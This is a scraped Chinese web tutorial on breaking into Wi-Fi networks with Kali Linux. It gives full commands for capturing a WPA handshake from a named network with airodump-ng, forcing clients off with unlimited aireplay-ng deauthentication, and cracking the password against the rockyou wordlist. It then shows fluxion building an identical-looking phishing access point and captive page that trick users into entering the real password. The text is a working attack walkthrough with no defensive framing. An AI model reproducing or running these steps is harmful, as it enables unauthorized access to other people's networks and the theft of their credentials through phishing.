Kali Linux暴力穷举法破解Wi |
您所在的位置:网站首页 › kali linux入门口令 › Kali Linux暴力穷举法破解Wi |
Kali Linux暴力穷举法 破解Wi-Fi密码 && fluxion 6.8最新版钓鱼 超详细教程 fluxion项目地址: https://www.github.com/FluxionNetwork/fluxion.git Kali Linux 2020.02最新镜像: https://www.kali.org/downloads/ 更新镜像源地址打开终端,输入 vim /etc/apt/sources.list 如果,vim不会使用,可以安装leafpad文本编辑器来添加源 安装文本编辑器:sudo apt-get install leafpad 用文本编辑器打开文件:leafpad /etc/apt/sources.list 在后面添加源注意:中文注释要前面要加#,不然会报错,无法更新源 保存退出后,运行 apt-get update 首先,安装最新版fluxion工具 git clone https://www.github.com/FluxionNetwork/fluxion.git cd fluxion ./fluxion.sh
运行fluxion:./fluxion.sh 初次打开fluxion会出现missing,依赖丢失 输入 ./fluxion.sh -i 进行下载依赖 安装完毕,会出现语言选项,这里选 17中文 现在,fluxion 6.8已安装完毕 aircrack进行暴力破解首先,准备一个支持监听的USB无线网卡 输入 ifconfig 命令,得知无线网卡是wlan0 开启监听模式:airmon-ng start wlan0 出现上图,说明监听模式已经开启 监听模式开启后,Kali Linux会出现断网,如需要关闭监听模式,输入 arimon-ng stop wlan0mon 即可 搜索Wi-Fi输入命令:airodump-ng wlan0mon 来搜索附近的Wi-Fi
找到目标后,按 control + c 停止进程 抓取握手包这里以ChinaNet-AdministratorWi-Fi为例。
输入:airodump-ng -c 11 --bssid A8:9D:D2:33:BF:90 -w /root/wifi/test-01 wlan0mon -w /root/wifi/ 表示获取握手包存放的路径 test-01 表示改握手包的名称,可以任意命名 发送反认证包攻击新建一个终端窗口 输入:aireplay-ng -0 0 -a A8:9D:D2:33:BF:90 wlan0mon -0 表示发送反认证包的次数,0代表无数次 -a 表示路由器的MAC地址 此时,设备会断线,重新连接。 按 control + c 结束反认证攻击,捕获到握手包handshake 捕获到握手包存放的路径为:/root/wifi/test-01 改路径可以自己自定义 Kali Linux有自带字典文件 字典存放路径为: /usr/share/wordlist/ 用 gzip -d 命令对字典进行解压 输入命令:aircrack -ng -a2 -b A8:9D:D2:33:BF:90 -w /usr/share/wordlists/rockyou.txt /root/wifi/test-01-01.cap 开始暴力破解 破解成功!!! 对于弱口令的秘密,Kail自带字典绰绰有余,复杂难度高的,需要找大型的字典文件进行破解。 对于复杂难度高的Wi-Fi密码,不想暴力穷举法,那就利用钓鱼Wi-Fi,不管你设置的密码多么复杂,密码都百分百正确。 运行fluxion输入: ./fluxion 按需求选择Wi-Fi的频率,这里选择2.4Ghz
找到目标Wi-Fi,按 control + c停止
此时,设备(手机)被强制断线,并出现钓鱼Wi-Fi(名称和原Wi-Fi一模一样) 连接原来的Wi-Fi,提示密码错误,只能被迫连接钓鱼Wi-Fi
连接到钓鱼Wi-Fi,会自动打开浏览器,访问钓鱼页面 必须输正确的密码,否则无法连接上原来的Wi-Fi 输入正确的密码后,钓鱼Wi-Fi和钓鱼页面会自动消失 此时,Kali Linux这边出现钓鱼成功的消息 根据路径,找出存放钓鱼页面密码的目录 钓鱼成功!!! |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |